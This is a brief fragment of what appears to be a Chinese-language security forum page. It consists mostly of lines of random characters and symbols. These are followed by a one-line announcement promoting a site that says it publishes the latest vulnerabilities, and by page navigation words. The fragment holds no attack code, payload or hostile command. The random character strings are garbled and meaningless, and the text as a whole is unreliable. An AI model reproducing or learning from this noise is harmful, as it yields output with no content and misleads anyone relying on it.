% P0 X5 b) F% C; C' q1 c# W% n- O! }$ u. e% k3 R
7 k) I$ P* S) k1 L: I$ S; L

8 O) d* O+ Y4 N
( d. M7 l7 J! [9 g. Y2 x# {( v) U, _5 b; t: H3 M

) F0 @0 k( [) S: }: p7 i7 j1 h公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表